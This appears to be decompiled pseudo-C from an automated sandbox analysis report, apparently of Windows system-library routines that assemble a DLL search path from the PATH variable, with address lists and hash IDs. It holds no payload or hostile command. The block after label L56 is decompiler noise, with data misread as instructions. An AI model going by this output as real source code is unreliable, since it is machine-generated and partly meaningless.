                                                                      			E01342581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912048) {
                                                                      				signed int _v8;
                                                                      				signed int _v16;
                                                                      				unsigned int _v24;
                                                                      				void* _v28;
                                                                      				signed int _v32;
                                                                      				unsigned int _v36;
                                                                      				signed int _v37;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				intOrPtr _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _t240;
                                                                      				signed char _t244;
                                                                      				signed char _t247;
                                                                      				void* _t248;
                                                                      				signed int _t249;
                                                                      				signed char _t250;
                                                                      				signed char _t251;
                                                                      				signed char _t252;
                                                                      				signed int _t255;
                                                                      				signed int _t257;
                                                                      				intOrPtr _t259;
                                                                      				signed int _t262;
                                                                      				signed int _t269;
                                                                      				signed int _t272;
                                                                      				signed int _t280;
                                                                      				intOrPtr _t286;
                                                                      				signed int _t288;
                                                                      				signed int _t290;
                                                                      				void* _t291;
                                                                      				signed int _t292;
                                                                      				unsigned int _t295;
                                                                      				signed int _t299;
                                                                      				intOrPtr* _t300;
                                                                      				signed int _t301;
                                                                      				signed int _t305;
                                                                      				intOrPtr _t317;
                                                                      				signed int _t326;
                                                                      				signed int _t328;
                                                                      				signed int _t329;
                                                                      				signed int _t333;
                                                                      				signed int _t334;
                                                                      				void* _t336;
                                                                      				signed int _t339;
                                                                      				signed int _t341;
                                                                      				signed int _t344;
                                                                      				signed int _t345;
                                                                      				void* _t347;
                                                                      
                                                                      				_t341 = _t344;
                                                                      				_t345 = _t344 - 0x4c;
                                                                      				_v8 =  *0x140d360 ^ _t341;
                                                                      				_push(__ebx);
                                                                      				_push(__esi);
                                                                      				_push(__edi);
                                                                      				_t333 = 0x140b2e8;
                                                                      				_v56 = _a4;
                                                                      				_v48 = __edx;
                                                                      				_v60 = __ecx;
                                                                      				_t295 = 0;
                                                                      				_v80 = 0;
                                                                      				asm("movsd");
                                                                      				_v64 = 0;
                                                                      				_v76 = 0;
                                                                      				_v72 = 0;
                                                                      				asm("movsd");
                                                                      				_v44 = 0;
                                                                      				_v52 = 0;
                                                                      				_v68 = 0;
                                                                      				asm("movsd");
                                                                      				_v32 = 0;
                                                                      				_v36 = 0;
                                                                      				asm("movsd");
                                                                      				_v16 = 0;
                                                                      				_t286 = 0x48;
                                                                      				_t315 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                                      				_t326 = 0;
                                                                      				_v37 = _t315;
                                                                      				if(_v48 <= 0) {
                                                                      					L16:
                                                                      					_t45 = _t286 - 0x48; // 0x0
                                                                      					__eflags = _t45 - 0xfffe;
                                                                      					if(_t45 > 0xfffe) {
                                                                      						_t334 = 0xc0000106;
                                                                      						goto L32;
                                                                      					} else {
                                                                      						_t333 = L01334620(_t295,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t286);
                                                                      						_v52 = _t333;
                                                                      						__eflags = _t333;
                                                                      						if(_t333 == 0) {
                                                                      							_t334 = 0xc0000017;
                                                                      							goto L32;
                                                                      						} else {
                                                                      							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
                                                                      							_t50 = _t333 + 0x48; // 0x48
                                                                      							_t328 = _t50;
                                                                      							_t315 = _v32;
                                                                      							 *((intOrPtr*)(_t333 + 0x3c)) = _t286;
                                                                      							_t288 = 0;
                                                                      							 *((short*)(_t333 + 0x30)) = _v48;
                                                                      							__eflags = _t315;
                                                                      							if(_t315 != 0) {
                                                                      								 *(_t333 + 0x18) = _t328;
                                                                      								__eflags = _t315 - 0x1408478;
                                                                      								 *_t333 = ((0 | _t315 == 0x01408478) - 0x00000001 & 0xfffffffb) + 7;
                                                                      								E0135F3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
                                                                      								_t315 = _v32;
                                                                      								_t345 = _t345 + 0xc;
                                                                      								_t288 = 1;
                                                                      								__eflags = _a8;
                                                                      								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
                                                                      								if(_a8 != 0) {
                                                                      									_t280 = E013A39F2(_t328);
                                                                      									_t315 = _v32;
                                                                      									_t328 = _t280;
                                                                      								}
                                                                      							}
                                                                      							_t299 = 0;
                                                                      							_v16 = 0;
                                                                      							__eflags = _v48;
                                                                      							if(_v48 <= 0) {
                                                                      								L31:
                                                                      								_t334 = _v68;
                                                                      								__eflags = 0;
                                                                      								 *((short*)(_t328 - 2)) = 0;
                                                                      								goto L32;
                                                                      							} else {
                                                                      								_t290 = _t333 + _t288 * 4;
                                                                      								_v56 = _t290;
                                                                      								do {
                                                                      									__eflags = _t315;
                                                                      									if(_t315 != 0) {
                                                                      										_t240 =  *(_v60 + _t299 * 4);
                                                                      										__eflags = _t240;
                                                                      										if(_t240 == 0) {
                                                                      											goto L30;
                                                                      										} else {
                                                                      											__eflags = _t240 == 5;
                                                                      											if(_t240 == 5) {
                                                                      												goto L30;
                                                                      											} else {
                                                                      												goto L22;
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										L22:
                                                                      										 *_t290 =  *(_v60 + _t299 * 4);
                                                                      										 *(_t290 + 0x18) = _t328;
                                                                      										_t244 =  *(_v60 + _t299 * 4);
                                                                      										__eflags = _t244 - 8;
                                                                      										if(_t244 > 8) {
                                                                      											goto L56;
                                                                      										} else {
                                                                      											switch( *((intOrPtr*)(_t244 * 4 +  &M01342959))) {
                                                                      												case 0:
                                                                      													__ax =  *0x1408488;
                                                                      													__eflags = __ax;
                                                                      													if(__ax == 0) {
                                                                      														goto L29;
                                                                      													} else {
                                                                      														__ax & 0x0000ffff = E0135F3E0(__edi,  *0x140848c, __ax & 0x0000ffff);
                                                                      														__eax =  *0x1408488 & 0x0000ffff;
                                                                      														goto L26;
                                                                      													}
                                                                      													goto L108;
                                                                      												case 1:
                                                                      													L45:
                                                                      													E0135F3E0(_t328, _v80, _v64);
                                                                      													_t275 = _v64;
                                                                      													goto L26;
                                                                      												case 2:
                                                                      													 *0x1408480 & 0x0000ffff = E0135F3E0(__edi,  *0x1408484,  *0x1408480 & 0x0000ffff);
                                                                      													__eax =  *0x1408480 & 0x0000ffff;
                                                                      													__eax = ( *0x1408480 & 0x0000ffff) >> 1;
                                                                      													__edi = __edi + __eax * 2;
                                                                      													goto L28;
                                                                      												case 3:
                                                                      													__eax = _v44;
                                                                      													__eflags = __eax;
                                                                      													if(__eax == 0) {
                                                                      														goto L29;
                                                                      													} else {
                                                                      														__esi = __eax + __eax;
                                                                      														__eax = E0135F3E0(__edi, _v72, __esi);
                                                                      														__edi = __edi + __esi;
                                                                      														__esi = _v52;
                                                                      														goto L27;
                                                                      													}
                                                                      													goto L108;
                                                                      												case 4:
                                                                      													_push(0x2e);
                                                                      													_pop(__eax);
                                                                      													 *(__esi + 0x44) = __edi;
                                                                      													 *__edi = __ax;
                                                                      													__edi = __edi + 4;
                                                                      													_push(0x3b);
                                                                      													_pop(__eax);
                                                                      													 *(__edi - 2) = __ax;
                                                                      													goto L29;
                                                                      												case 5:
                                                                      													__eflags = _v36;
                                                                      													if(_v36 == 0) {
                                                                      														goto L45;
                                                                      													} else {
                                                                      														E0135F3E0(_t328, _v76, _v36);
                                                                      														_t275 = _v36;
                                                                      													}
                                                                      													L26:
                                                                      													_t345 = _t345 + 0xc;
                                                                      													_t328 = _t328 + (_t275 >> 1) * 2 + 2;
                                                                      													__eflags = _t328;
                                                                      													L27:
                                                                      													_push(0x3b);
                                                                      													_pop(_t277);
                                                                      													 *((short*)(_t328 - 2)) = _t277;
                                                                      													goto L28;
                                                                      												case 6:
                                                                      													__ebx =  *0x140575c;
                                                                      													__eflags = __ebx - 0x140575c;
                                                                      													if(__ebx != 0x140575c) {
                                                                      														_push(0x3b);
                                                                      														_pop(__esi);
                                                                      														do {
                                                                      															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                      															E0135F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                      															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                      															__edi = __edi + __eax * 2;
                                                                      															__edi = __edi + 2;
                                                                      															 *(__edi - 2) = __si;
                                                                      															__ebx =  *__ebx;
                                                                      															__eflags = __ebx - 0x140575c;
                                                                      														} while (__ebx != 0x140575c);
                                                                      														__esi = _v52;
                                                                      														__ecx = _v16;
                                                                      														__edx = _v32;
                                                                      													}
                                                                      													__ebx = _v56;
                                                                      													goto L29;
                                                                      												case 7:
                                                                      													 *0x1408478 & 0x0000ffff = E0135F3E0(__edi,  *0x140847c,  *0x1408478 & 0x0000ffff);
                                                                      													__eax =  *0x1408478 & 0x0000ffff;
                                                                      													__eax = ( *0x1408478 & 0x0000ffff) >> 1;
                                                                      													__eflags = _a8;
                                                                      													__edi = __edi + __eax * 2;
                                                                      													if(_a8 != 0) {
                                                                      														__ecx = __edi;
                                                                      														__eax = E013A39F2(__ecx);
                                                                      														__edi = __eax;
                                                                      													}
                                                                      													goto L28;
                                                                      												case 8:
                                                                      													__eax = 0;
                                                                      													 *(__edi - 2) = __ax;
                                                                      													 *0x1406e58 & 0x0000ffff = E0135F3E0(__edi,  *0x1406e5c,  *0x1406e58 & 0x0000ffff);
                                                                      													 *(__esi + 0x38) = __edi;
                                                                      													__eax =  *0x1406e58 & 0x0000ffff;
                                                                      													__eax = ( *0x1406e58 & 0x0000ffff) >> 1;
                                                                      													__edi = __edi + __eax * 2;
                                                                      													__edi = __edi + 2;
                                                                      													L28:
                                                                      													_t299 = _v16;
                                                                      													_t315 = _v32;
                                                                      													L29:
                                                                      													_t290 = _t290 + 4;
                                                                      													__eflags = _t290;
                                                                      													_v56 = _t290;
                                                                      													goto L30;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									goto L108;
                                                                      									L30:
                                                                      									_t299 = _t299 + 1;
                                                                      									_v16 = _t299;
                                                                      									__eflags = _t299 - _v48;
                                                                      								} while (_t299 < _v48);
                                                                      								goto L31;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					while(1) {
                                                                      						L1:
                                                                      						_t244 =  *(_v60 + _t326 * 4);
                                                                      						if(_t244 > 8) {
                                                                      							break;
                                                                      						}
                                                                      						switch( *((intOrPtr*)(_t244 * 4 +  &M01342935))) {
                                                                      							case 0:
                                                                      								__ax =  *0x1408488;
                                                                      								__eflags = __ax;
                                                                      								if(__ax != 0) {
                                                                      									__eax = __ax & 0x0000ffff;
                                                                      									__ebx = __ebx + 2;
                                                                      									__eflags = __ebx;
                                                                      									goto L53;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 1:
                                                                      								L44:
                                                                      								_t315 =  &_v64;
                                                                      								_v80 = E01342E3E(0,  &_v64);
                                                                      								_t286 = _t286 + _v64 + 2;
                                                                      								goto L13;
                                                                      							case 2:
                                                                      								__eax =  *0x1408480 & 0x0000ffff;
                                                                      								__ebx = __ebx + __eax;
                                                                      								__eflags = __dl;
                                                                      								if(__dl != 0) {
                                                                      									__eax = 0x1408480;
                                                                      									goto L80;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 3:
                                                                      								__eax = E0132EEF0(0x14079a0);
                                                                      								__eax =  &_v44;
                                                                      								_push(__eax);
                                                                      								_push(0);
                                                                      								_push(0);
                                                                      								_push(4);
                                                                      								_push(L"PATH");
                                                                      								_push(0);
                                                                      								L57();
                                                                      								__esi = __eax;
                                                                      								_v68 = __esi;
                                                                      								__eflags = __esi - 0xc0000023;
                                                                      								if(__esi != 0xc0000023) {
                                                                      									L10:
                                                                      									__eax = E0132EB70(__ecx, 0x14079a0);
                                                                      									__eflags = __esi - 0xc0000100;
                                                                      									if(__esi == 0xc0000100) {
                                                                      										_v44 = _v44 & 0x00000000;
                                                                      										__eax = 0;
                                                                      										_v68 = 0;
                                                                      										goto L13;
                                                                      									} else {
                                                                      										__eflags = __esi;
                                                                      										if(__esi < 0) {
                                                                      											L32:
                                                                      											_t218 = _v72;
                                                                      											__eflags = _t218;
                                                                      											if(_t218 != 0) {
                                                                      												L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
                                                                      											}
                                                                      											_t219 = _v52;
                                                                      											__eflags = _t219;
                                                                      											if(_t219 != 0) {
                                                                      												__eflags = _t334;
                                                                      												if(_t334 < 0) {
                                                                      													L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
                                                                      													_t219 = 0;
                                                                      												}
                                                                      											}
                                                                      											goto L36;
                                                                      										} else {
                                                                      											__eax = _v44;
                                                                      											__ebx = __ebx + __eax * 2;
                                                                      											__ebx = __ebx + 2;
                                                                      											__eflags = __ebx;
                                                                      											L13:
                                                                      											_t295 = _v36;
                                                                      											goto L14;
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									__eax = _v44;
                                                                      									__ecx =  *0x1407b9c; // 0x0
                                                                      									_v44 + _v44 =  *[fs:0x30];
                                                                      									__ecx = __ecx + 0x180000;
                                                                      									__eax = L01334620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                      									_v72 = __eax;
                                                                      									__eflags = __eax;
                                                                      									if(__eax == 0) {
                                                                      										__eax = E0132EB70(__ecx, 0x14079a0);
                                                                      										__eax = _v52;
                                                                      										L36:
                                                                      										_pop(_t327);
                                                                      										_pop(_t335);
                                                                      										__eflags = _v8 ^ _t341;
                                                                      										_pop(_t287);
                                                                      										return E0135B640(_t219, _t287, _v8 ^ _t341, _t315, _t327, _t335);
                                                                      									} else {
                                                                      										__ecx =  &_v44;
                                                                      										_push(__ecx);
                                                                      										_push(_v44);
                                                                      										_push(__eax);
                                                                      										_push(4);
                                                                      										_push(L"PATH");
                                                                      										_push(0);
                                                                      										L57();
                                                                      										__esi = __eax;
                                                                      										_v68 = __eax;
                                                                      										goto L10;
                                                                      									}
                                                                      								}
                                                                      								goto L108;
                                                                      							case 4:
                                                                      								__ebx = __ebx + 4;
                                                                      								goto L14;
                                                                      							case 5:
                                                                      								_t282 = _v56;
                                                                      								if(_v56 != 0) {
                                                                      									_t315 =  &_v36;
                                                                      									_t284 = E01342E3E(_t282,  &_v36);
                                                                      									_t295 = _v36;
                                                                      									_v76 = _t284;
                                                                      								}
                                                                      								if(_t295 == 0) {
                                                                      									goto L44;
                                                                      								} else {
                                                                      									_t286 = _t286 + 2 + _t295;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 6:
                                                                      								__eax =  *0x1405764 & 0x0000ffff;
                                                                      								goto L53;
                                                                      							case 7:
                                                                      								__eax =  *0x1408478 & 0x0000ffff;
                                                                      								__ebx = __ebx + __eax;
                                                                      								__eflags = _a8;
                                                                      								if(_a8 != 0) {
                                                                      									__ebx = __ebx + 0x16;
                                                                      									__ebx = __ebx + __eax;
                                                                      								}
                                                                      								__eflags = __dl;
                                                                      								if(__dl != 0) {
                                                                      									__eax = 0x1408478;
                                                                      									L80:
                                                                      									_v32 = __eax;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 8:
                                                                      								__eax =  *0x1406e58 & 0x0000ffff;
                                                                      								__eax = ( *0x1406e58 & 0x0000ffff) + 2;
                                                                      								L53:
                                                                      								__ebx = __ebx + __eax;
                                                                      								L14:
                                                                      								_t326 = _t326 + 1;
                                                                      								if(_t326 >= _v48) {
                                                                      									goto L16;
                                                                      								} else {
                                                                      									_t315 = _v37;
                                                                      									goto L1;
                                                                      								}
                                                                      								goto L108;
                                                                      						}
                                                                      					}
                                                                      					L56:
                                                                      					_t300 = 0x25;
                                                                      					asm("int 0x29");
                                                                      					asm("out 0x28, al");
                                                                      					asm("o16 sub [ecx+eax], dh");
                                                                      					asm("loopne 0x29");
                                                                      					_t247 = _t244 ^ 1;
                                                                      					_t336 = _t333 + 1;
                                                                      					 *((intOrPtr*)(_t300 + _t247)) =  *((intOrPtr*)(_t300 + _t247)) - _t315;
                                                                      					_t248 = _t247 + 0x1f013426;
                                                                      					_pop(_t291);
                                                                      					__eflags =  *_t300 - _t248;
                                                                      					_t249 = _t345;
                                                                      					_t347 = _t248;
                                                                      					 *((intOrPtr*)(_t300 + _t249)) =  *((intOrPtr*)(_t300 + _t249)) - _t315;
                                                                      					_t250 = _t249 ^ 0x0201385b;
                                                                      					 *((intOrPtr*)(_t300 + _t250)) =  *((intOrPtr*)(_t300 + _t250)) - _t336;
                                                                      					 *_t250 =  *_t250 - 0x34;
                                                                      					asm("daa");
                                                                      					_t251 = _t250 ^ 0x00000001;
                                                                      					_push(ds);
                                                                      					 *((intOrPtr*)(_t300 + _t251)) =  *((intOrPtr*)(_t300 + _t251)) - _t315;
                                                                      					_t338 = _t336 + _t336 - 1;
                                                                      					 *((intOrPtr*)(_t300 + _t251)) =  *((intOrPtr*)(_t300 + _t251)) - _t315;
                                                                      					asm("daa");
                                                                      					_t252 = _t251 ^ 0x00000001;
                                                                      					asm("fcomp dword [ebx+0x38]");
                                                                      					 *((intOrPtr*)(_t252 +  &_a1546912048)) =  *((intOrPtr*)(_t252 +  &_a1546912048)) + _t336 + _t336 - 1;
                                                                      					__eflags =  *_t300 - _t252;
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					_push(0x20);
                                                                      					_push(0x13eff00);
                                                                      					E0136D08C(_t291, _t328, _t338);
                                                                      					_v44 =  *[fs:0x18];
                                                                      					_t329 = 0;
                                                                      					 *_a24 = 0;
                                                                      					_t292 = _a12;
                                                                      					__eflags = _t292;
                                                                      					if(_t292 == 0) {
                                                                      						_t255 = 0xc0000100;
                                                                      					} else {
                                                                      						_v8 = 0;
                                                                      						_t339 = 0xc0000100;
                                                                      						_v52 = 0xc0000100;
                                                                      						_t257 = 4;
                                                                      						while(1) {
                                                                      							_v40 = _t257;
                                                                      							__eflags = _t257;
                                                                      							if(_t257 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t305 = _t257 * 0xc;
                                                                      							_v48 = _t305;
                                                                      							__eflags = _t292 -  *((intOrPtr*)(_t305 + 0x12f1664));
                                                                      							if(__eflags <= 0) {
                                                                      								if(__eflags == 0) {
                                                                      									_t272 = E0135E5C0(_a8,  *((intOrPtr*)(_t305 + 0x12f1668)), _t292);
                                                                      									_t347 = _t347 + 0xc;
                                                                      									__eflags = _t272;
                                                                      									if(__eflags == 0) {
                                                                      										_t339 = E013951BE(_t292,  *((intOrPtr*)(_v48 + 0x12f166c)), _a16, _t329, _t339, __eflags, _a20, _a24);
                                                                      										_v52 = _t339;
                                                                      										break;
                                                                      									} else {
                                                                      										_t257 = _v40;
                                                                      										goto L62;
                                                                      									}
                                                                      									goto L70;
                                                                      								} else {
                                                                      									L62:
                                                                      									_t257 = _t257 - 1;
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						_v32 = _t339;
                                                                      						__eflags = _t339;
                                                                      						if(_t339 < 0) {
                                                                      							__eflags = _t339 - 0xc0000100;
                                                                      							if(_t339 == 0xc0000100) {
                                                                      								_t301 = _a4;
                                                                      								__eflags = _t301;
                                                                      								if(_t301 != 0) {
                                                                      									_v36 = _t301;
                                                                      									__eflags =  *_t301 - _t329;
                                                                      									if( *_t301 == _t329) {
                                                                      										_t339 = 0xc0000100;
                                                                      										goto L76;
                                                                      									} else {
                                                                      										_t317 =  *((intOrPtr*)(_v44 + 0x30));
                                                                      										_t259 =  *((intOrPtr*)(_t317 + 0x10));
                                                                      										__eflags =  *((intOrPtr*)(_t259 + 0x48)) - _t301;
                                                                      										if( *((intOrPtr*)(_t259 + 0x48)) == _t301) {
                                                                      											__eflags =  *(_t317 + 0x1c);
                                                                      											if( *(_t317 + 0x1c) == 0) {
                                                                      												L106:
                                                                      												_t339 = E01342AE4( &_v36, _a8, _t292, _a16, _a20, _a24);
                                                                      												_v32 = _t339;
                                                                      												__eflags = _t339 - 0xc0000100;
                                                                      												if(_t339 != 0xc0000100) {
                                                                      													goto L69;
                                                                      												} else {
                                                                      													_t329 = 1;
                                                                      													_t301 = _v36;
                                                                      													goto L75;
                                                                      												}
                                                                      											} else {
                                                                      												_t262 = E01326600( *(_t317 + 0x1c));
                                                                      												__eflags = _t262;
                                                                      												if(_t262 != 0) {
                                                                      													goto L106;
                                                                      												} else {
                                                                      													_t301 = _a4;
                                                                      													goto L75;
                                                                      												}
                                                                      											}
                                                                      										} else {
                                                                      											L75:
                                                                      											_t339 = E01342C50(_t301, _a8, _t292, _a16, _a20, _a24, _t329);
                                                                      											L76:
                                                                      											_v32 = _t339;
                                                                      											goto L69;
                                                                      										}
                                                                      									}
                                                                      									goto L108;
                                                                      								} else {
                                                                      									E0132EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                      									_v8 = 1;
                                                                      									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                      									_t339 = _a24;
                                                                      									_t269 = E01342AE4( &_v36, _a8, _t292, _a16, _a20, _t339);
                                                                      									_v32 = _t269;
                                                                      									__eflags = _t269 - 0xc0000100;
                                                                      									if(_t269 == 0xc0000100) {
                                                                      										_v32 = E01342C50(_v36, _a8, _t292, _a16, _a20, _t339, 1);
                                                                      									}
                                                                      									_v8 = _t329;
                                                                      									E01342ACB();
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L69:
                                                                      						_v8 = 0xfffffffe;
                                                                      						_t255 = _t339;
                                                                      					}
                                                                      					L70:
                                                                      					return E0136D0D1(_t255);
                                                                      				}
                                                                      				L108:
                                                                      			}


























































                                                                      0x013426d2
                                                                      0x013426d2
                                                                      0x00000000
                                                                      0x013426d2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013425fe
                                                                      0x0134292d
                                                                      0x0134292f
                                                                      0x01342930
                                                                      0x01342935
                                                                      0x01342939
                                                                      0x0134293d
                                                                      0x01342941
                                                                      0x01342945
                                                                      0x01342946
                                                                      0x01342949
                                                                      0x0134294e
                                                                      0x0134294f
                                                                      0x01342951
                                                                      0x01342951
                                                                      0x01342952
                                                                      0x01342955
                                                                      0x0134295a
                                                                      0x0134295d
                                                                      0x01342962
                                                                      0x01342963
                                                                      0x01342965
                                                                      0x01342966
                                                                      0x01342969
                                                                      0x0134296a
                                                                      0x0134296e
                                                                      0x0134296f
                                                                      0x01342971
                                                                      0x01342974
                                                                      0x0134297b
                                                                      0x0134297d
                                                                      0x0134297e
                                                                      0x0134297f
                                                                      0x01342980
                                                                      0x01342981
                                                                      0x01342982
                                                                      0x01342983
                                                                      0x01342984
                                                                      0x01342985
                                                                      0x01342986
                                                                      0x01342987
                                                                      0x01342988
                                                                      0x01342989
                                                                      0x0134298a
                                                                      0x0134298b
                                                                      0x0134298c
                                                                      0x0134298d
                                                                      0x0134298e
                                                                      0x0134298f
                                                                      0x01342990
                                                                      0x01342992
                                                                      0x01342997
                                                                      0x013429a3
                                                                      0x013429a6
                                                                      0x013429ab
                                                                      0x013429ad
                                                                      0x013429b0
                                                                      0x013429b2
                                                                      0x01385c80
                                                                      0x013429b8
                                                                      0x013429b8
                                                                      0x013429bb
                                                                      0x013429c0
                                                                      0x013429c5
                                                                      0x013429c6
                                                                      0x013429c6
                                                                      0x013429c9
                                                                      0x013429cb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013429cd
                                                                      0x013429d0
                                                                      0x013429d9
                                                                      0x013429db
                                                                      0x013429dd
                                                                      0x01342a7f
                                                                      0x01342a84
                                                                      0x01342a87
                                                                      0x01342a89
                                                                      0x01385ca1
                                                                      0x01385ca3
                                                                      0x00000000
                                                                      0x01342a8f
                                                                      0x01342a8f
                                                                      0x00000000
                                                                      0x01342a8f
                                                                      0x00000000
                                                                      0x013429e3
                                                                      0x013429e3
                                                                      0x013429e3
                                                                      0x00000000
                                                                      0x013429e3
                                                                      0x013429dd
                                                                      0x00000000
                                                                      0x013429db
                                                                      0x013429e6
                                                                      0x013429e9
                                                                      0x013429eb
                                                                      0x013429ed
                                                                      0x013429f3
                                                                      0x013429f5
                                                                      0x013429f8
                                                                      0x013429fa
                                                                      0x01342a97
                                                                      0x01342a9a
                                                                      0x01342a9d
                                                                      0x01342add
                                                                      0x00000000
                                                                      0x01342a9f
                                                                      0x01342aa2
                                                                      0x01342aa5
                                                                      0x01342aa8
                                                                      0x01342aab
                                                                      0x01385cab
                                                                      0x01385caf
                                                                      0x01385cc5
                                                                      0x01385cda
                                                                      0x01385cdc
                                                                      0x01385cdf
                                                                      0x01385ce5
                                                                      0x00000000
                                                                      0x01385ceb
                                                                      0x01385ced
                                                                      0x01385cee
                                                                      0x00000000
                                                                      0x01385cee
                                                                      0x01385cb1
                                                                      0x01385cb4
                                                                      0x01385cb9
                                                                      0x01385cbb
                                                                      0x00000000
                                                                      0x01385cbd
                                                                      0x01385cbd
                                                                      0x00000000
                                                                      0x01385cbd
                                                                      0x01385cbb
                                                                      0x01342ab1
                                                                      0x01342ab1
                                                                      0x01342ac4
                                                                      0x01342ac6
                                                                      0x01342ac6
                                                                      0x00000000
                                                                      0x01342ac6
                                                                      0x01342aab
                                                                      0x00000000
                                                                      0x01342a00
                                                                      0x01342a09
                                                                      0x01342a0e
                                                                      0x01342a21
                                                                      0x01342a24
                                                                      0x01342a35
                                                                      0x01342a3a
                                                                      0x01342a3d
                                                                      0x01342a42
                                                                      0x01342a59
                                                                      0x01342a59
                                                                      0x01342a5c
                                                                      0x01342a5f
                                                                      0x01342a5f
                                                                      0x013429fa
                                                                      0x013429f3
                                                                      0x01342a64
                                                                      0x01342a64
                                                                      0x01342a6b
                                                                      0x01342a6b
                                                                      0x01342a6d
                                                                      0x01342a72
                                                                      0x01342a72
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PATH
                                                                      • API String ID: 0-1036084923
                                                                      • Opcode ID: 5de2f69ce3870974f7b8abd0e6be91116651b8d4c88b5fa9c51c3dbf6e5753c7
                                                                      • Instruction ID: c23f08ed19a74aec4bf1a5ebf24148357f34b38cbb73c597265622943bb181a1
                                                                      • Opcode Fuzzy Hash: 5de2f69ce3870974f7b8abd0e6be91116651b8d4c88b5fa9c51c3dbf6e5753c7
                                                                      • Instruction Fuzzy Hash: E4C1AF75D00219DBDB25DF99E980AAEBBF5FF48758F044029F901BB250E774A941CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E0134FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                      				char _v5;
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				char _v16;
                                                                      				char _v17;
                                                                      				char _v20;
                                                                      				signed int _v24;
                                                                      				char _v28;
                                                                      				char _v32;
                                                                      				signed int _v40;
                                                                      				void* __ecx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				signed int _t73;
                                                                      				intOrPtr* _t75;
                                                                      				signed int _t77;
                                                                      				signed int _t79;
                                                                      				signed int _t81;
                                                                      				intOrPtr _t83;
                                                                      				intOrPtr _t85;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t91;
                                                                      				signed int _t94;
                                                                      				signed int _t95;
                                                                      				signed int _t96;
                                                                      				signed int _t106;
                                                                      				signed int _t108;
                                                                      				signed int _t114;
                                                                      				signed int _t116;
                                                                      				signed int _t118;
                                                                      				signed int _t122;
                                                                      				signed int _t123;
                                                                      				void* _t129;
                                                                      				signed int _t130;
                                                                      				void* _t132;
                                                                      				intOrPtr* _t134;
                                                                      				signed int _t138;
                                                                      				signed int _t141;
                                                                      				signed int _t147;
                                                                      				intOrPtr _t153;
                                                                      				signed int _t154;
                                                                      				signed int _t155;
                                                                      				signed int _t170;
                                                                      				void* _t174;
                                                                      				signed int _t176;
                                                                      				signed int _t177;
                                                                      
                                                                      				_t129 = __ebx;
                                                                      				_push(_t132);
                                                                      				_push(__esi);
                                                                      				_t174 = _t132;
                                                                      				_t73 =  !( *( *(_t174 + 0x18)));
                                                                      				if(_t73 >= 0) {
                                                                      					L5:
                                                                      					return _t73;
                                                                      				} else {
                                                                      					E0132EEF0(0x1407b60);
                                                                      					_t134 =  *0x1407b84; // 0x771c7b80
                                                                      					_t2 = _t174 + 0x24; // 0x24
                                                                      					_t75 = _t2;
                                                                      					if( *_t134 != 0x1407b80) {
                                                                      						_push(3);
                                                                      						asm("int 0x29");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
